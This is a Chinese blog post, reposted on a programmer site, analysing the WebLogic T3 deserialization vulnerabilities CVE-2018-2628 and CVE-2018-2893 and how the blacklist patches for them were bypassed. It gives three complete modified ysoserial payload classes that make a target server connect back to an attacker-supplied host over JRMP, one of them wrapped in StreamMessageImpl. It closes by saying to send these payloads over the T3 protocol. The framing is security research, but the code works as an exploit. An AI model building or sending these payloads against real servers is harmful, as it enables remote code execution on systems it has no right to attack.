1. 全栈程序员必看首页

Java 安全之Weblogic 2018-2628&2018-2893分析

全栈程序员-站长 未分类 阅读 45

Java安全之Weblogic2018-2628&2018-2893分析0x00前言续上一个weblogicT3协议的反序列化漏洞接着分析该补丁的绕过方式,根据weblogic的补

大家好,又见面了,我是全栈君,祝每个程序员都可以多学几门语言。

Java 安全之Weblogic 2018-2628&2018-2893分析

0x00 前言

续上一个weblogic T3协议的反序列化漏洞接着分析该补丁的绕过方式,根据weblogic的补丁还是挺难找的,后面的分析中没有补丁看不到weblogic修复的细节,但是也不难猜处weblogic的这些修复都是老做法,使用黑名单的方式去进行修补漏洞。

0x01 补丁分析

由于没拿到补丁,这里从廖师傅文章里面扣除补丁的细节。

protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
   String[] arr$ = interfaces;
   int len$ = interfaces.length;
   for(int i$ = 0; i$ < len$; ++i$) {
      String intf = arr$[i$];
      if(intf.equals("java.rmi.registry.Registry")) {
         throw new InvalidObjectException("Unauthorized proxy deserialization");
      }
   }
   return super.resolveProxyClass(interfaces);
}

weblogic.rjvm.InboundMsgAbbrev$ServerChannelInputStream类的地方添加了一个resolveProxyClass方法,将resolveProxyClass给重写了,添加了一个传递过来的数据对应的接口进行遍历验证,如果为java.rmi.registry.Registry的话就直接抛出异常。如果不为java.rmi.registry.Registry就调用父类的resolveProxyClass

0x02 绕过思路

在2018-2628的绕过方式其实有两种,分别是:

  1. 在补丁里面仅仅只是限制了需要反序列化的数据为使用java.rmi.registry.Registry以外的类的接口,但是其实远程对象的接口不止java.rmi.registry.Registry这么一个。

廖师傅这里提供的绕过方式是将该接口替换成java.rmi.activation.Activator。即可绕过。

  1. ysoserial修改把Proxy部分去除掉,即可绕过补丁。这里来思考一下为什么Proxy部分去除就可以绕过了呢?

在前面的原生readobject分析文章里面讲到过readobject里面会走两个分支,反序列化的是动态代理的对象的话就会走resolveProxyClass分支里面,这里去除了Proxy部分内容,也就是说不使用动态代理的方式生成payload进行反序列化自然不会走到resolveProxyClass分支里面去。

0x03 利用思路

后面的调试内容,其实和前面的都是一样的,这里直接讲讲利用。

改写ysoserial

利用思路一,不使用代理对象:

package ysoserial.payloads;


import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.util.Random;



public class JRMPClient1 extends PayloadRunner implements ObjectPayload<Object> {

    public Object getObject(final String command) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        } else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        return ref;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient1.class.getClassLoader());
        PayloadRunner.run(JRMPClient1.class, args);
    }
}

对JRMPClient做一个小小的改动。

Java 安全之Weblogic 2018-2628&2018-2893分析

利用方式二,修改实现的远程接口为java.rmi.activation.Activator

package ysoserial.payloads;


import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

import java.lang.reflect.Proxy;
import java.rmi.activation.Activator;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;


@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient2 extends PayloadRunner implements ObjectPayload<Activator> {

    public Activator getObject (final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt()); // RMI registry
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);
        Activator proxy = (Activator) Proxy.newProxyInstance(JRMPClient2.class.getClassLoader(), new Class[] {
            Activator.class
        }, obj);
        return proxy;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient2.class.getClassLoader());
        PayloadRunner.run(JRMPClient2.class, args);
    }
}

Java 安全之Weblogic 2018-2628&2018-2893分析

0x04 CVE-2018-2893

CVE-2018-2893是CVE2018-2628的绕过,先来查看一下CVE-2018-2628的补丁细节

private static final String[] DEFAULT_BLACKLIST_CLASSES = new String[]{"org.codehaus.groovy.runtime.ConvertedClosure", "org.codehaus.groovy.runtime.ConversionHandler", "org.codehaus.groovy.runtime.MethodClosure", "org.springframework.transaction.support.AbstractPlatformTransactionManager", "sun.rmi.server.UnicastRef"};

改写ysoserial

这里利用方式是将远程的gadget对象封装进streamMessageImpl类里面,和CVE-2016-0638一样,不过这里用的是JRMPClient的gadget。

在改写的时候需要,注意几个细节。JDK里面没有streamMessageImpl类,这里需要讲weblogic的一些依赖jar包和类的代码给复制过来。这里是讲weblogic_cmd里面的部分内容扣出来放到了yso里面。

package ysoserial.payloads;


import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import weblogic.jms.common.StreamMessageImpl;
import ysoserial.Serializer;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;


@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient3 extends PayloadRunner implements ObjectPayload<Object> {

    public Object streamMessageImpl(byte[] object) {
        StreamMessageImpl streamMessage = new StreamMessageImpl();
        streamMessage.setDataBuffer(object, object.length);
        return streamMessage;
    }

    public Object getObject (final String command ) throws Exception {
        String host;
        int port;
        int sep = command.indexOf(':');
        if (sep < 0) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID objID = new ObjID(new Random().nextInt());
        TCPEndpoint tcpEndpoint = new TCPEndpoint(host, port);
        UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false));
        RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);
        Object object = Proxy.newProxyInstance(JRMPClient3.class.getClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler);
        return streamMessageImpl(Serializer.serialize(object));
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient3.class.getClassLoader());
        PayloadRunner.run(JRMPClient3.class, args);
    }
}

Java 安全之Weblogic 2018-2628&2018-2893分析

参考文章

Weblogic JRMP反序列化及绕过分析

weblogic之CVE-2017-3248,CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列绕过分析

0x05 末尾的絮絮叨叨

其实知道绕过方式和利用方式后,从yso进行一个修改打包成jar包,使用到上次2017-3248的时候用到的exp修改参数,通过T3协议发送payload过去就可以实现绕过了。和前面的内容都是一样的都是同一个漏洞,所以在这里不做多的赘述。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/119888.html原文链接:https://javaforall.net

(0)
0 0

关于作者

全栈程序员-站长的头像

全栈程序员-站长

133.5K 文章
3 粉丝
本网站汇聚当前互联网主流语音,持续更新,欢迎关注公众号“全栈程序员社区”
上一篇 2021年12月12日 下午10:00
下一篇 2021年12月12日 下午11:00


相关推荐

  • linux chown命令 例子,Linux系统之Chown命令用法介绍

    linux chown命令 例子,Linux系统之Chown命令用法介绍

    linux chown命令 例子,Linux系统之Chown命令用法介绍当我们要改变一个文件的属组 我们所使用的用户必须是该文件的属主而且同时是目标属组成员 或超级用户 这种情况的话 只有超级用户的才能改变文件的属主 在 Linux 操作系统的美国服务器当中 Chown 命令是 Linux 美国服务器系统最常用到的命令之一 它是用于改变文件或目录的访问权限 今天小编就简单介绍下 Chown 命令的用法 希望对大家有所帮助 chown 语法 chown 选项 所有者

    全栈程序员-站长的头像 全栈程序员-站长
    2025年11月4日
    6
  • C语言小游戏之扫雷完整版

    C语言小游戏之扫雷完整版

    C语言小游戏之扫雷完整版C语言小游戏之扫雷一.游戏介绍二.游戏步骤及实现的功能1.初始化雷盘2.打印雷盘3.随机布置雷4.玩家排雷5.防止玩家第一次被炸死6.统计所选位置周围八个位置中雷的个数7.拓展已选位置周围的区域8.标记雷及取消标记一.游戏介绍看到这张图片,相信很多小伙伴都非常熟悉,很多小伙伴都玩过扫雷这个小游戏,扫雷是一款益智类游戏,在放松娱乐的同时可以锻炼各位小伙伴的智商。游戏规则:如上图,玩家需要在不被炸死的前提下找出图中雷的位置,若能找出所有雷,则游戏胜利,若不幸踩到雷则被炸死。注:先介绍,后文会有完整代码

    全栈程序员-站长的头像 全栈程序员-站长
    2022年5月19日
    44
  • PCA 原理:为什么用协方差矩阵

    PCA 原理:为什么用协方差矩阵

    PCA 原理:为什么用协方差矩阵PCA 的理论知识以及与 K L 变换的关系 PCA 是主成分分析 PrincipalCom 的简称 这是一种数据降维技术 用于数据预处理 一般我们获取的原始数据维度都很高 那么我们可以运用 PCA 算法降低特征维度 这样不仅可以去除无用的噪声 还能减少很大的计算量 K L 转换 Karhunen Lo veTransform 是建立在统计特性基础上的一种转换 它是均方

    全栈程序员-站长的头像 全栈程序员-站长
    2026年3月17日
    2
  • 即梦ai年费可以退款吗 即梦Ai

    即梦ai年费可以退款吗

    即梦ai年费可以退款吗

    Ai探索者的头像 Ai探索者
    2026年3月12日
    3
  • 用户态与内核态之间切换详解[通俗易懂]

    用户态与内核态之间切换详解[通俗易懂]

    用户态与内核态之间切换详解[通俗易懂]用户态切换到内核态CPU中有一个标志字段,标志着线程的运行状态。用户态和内核态对应着不同的值,用户态为3,内核态为0.每个线程都对应着一个用户栈和内核栈,分别用来执行用户方法和内核方法。用户方法就是普通的操作。内核方法就是访问磁盘、内存分配、网卡、声卡等敏感操作。当用户尝试调用内核方法的时候,就会发生用户态切换到内核态的转变。切换流程:1、每个线程都对应这一个TCB,TCB中有一个TSS字段,存储着线程对应的内核栈的地址,也就是内核栈的栈顶指针。2、因为从用户态切换到内核态时,需要将用户态.

    全栈程序员-站长的头像 全栈程序员-站长
    2025年12月16日
    5
  • 《剑指offer》– 和为S的连续整数序列、和为S的两个数字、左旋转字符串、翻转单词顺序列

    《剑指offer》– 和为S的连续整数序列、和为S的两个数字、左旋转字符串、翻转单词顺序列

    《剑指offer》– 和为S的连续整数序列、和为S的两个数字、左旋转字符串、翻转单词顺序列

    全栈程序员-站长的头像 全栈程序员-站长
    2021年10月3日
    49

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号